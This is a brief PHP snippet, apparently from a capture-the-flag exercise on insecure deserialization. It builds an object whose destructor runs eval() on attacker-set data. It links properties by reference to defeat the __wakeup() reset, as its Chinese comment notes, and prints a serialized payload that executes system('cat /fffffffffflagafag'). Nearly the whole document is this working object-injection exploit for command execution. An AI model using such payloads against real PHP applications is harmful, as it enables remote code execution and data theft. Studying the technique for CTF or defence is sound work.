unserialize()
serialize()
<?php
class test{
public $a;
public $b;
public $c;
public function __construct(){
}
public function __wakeup(){
$this->a='';
}
public function __destruct(){
$this->b=$this->c;
eval($this->a);
}
}
$t=new test();
$t->b=&$t->a;
$t->c="system('cat /fffffffffflagafag');";
echo serialize($t);
?>//可绕过__wakeup()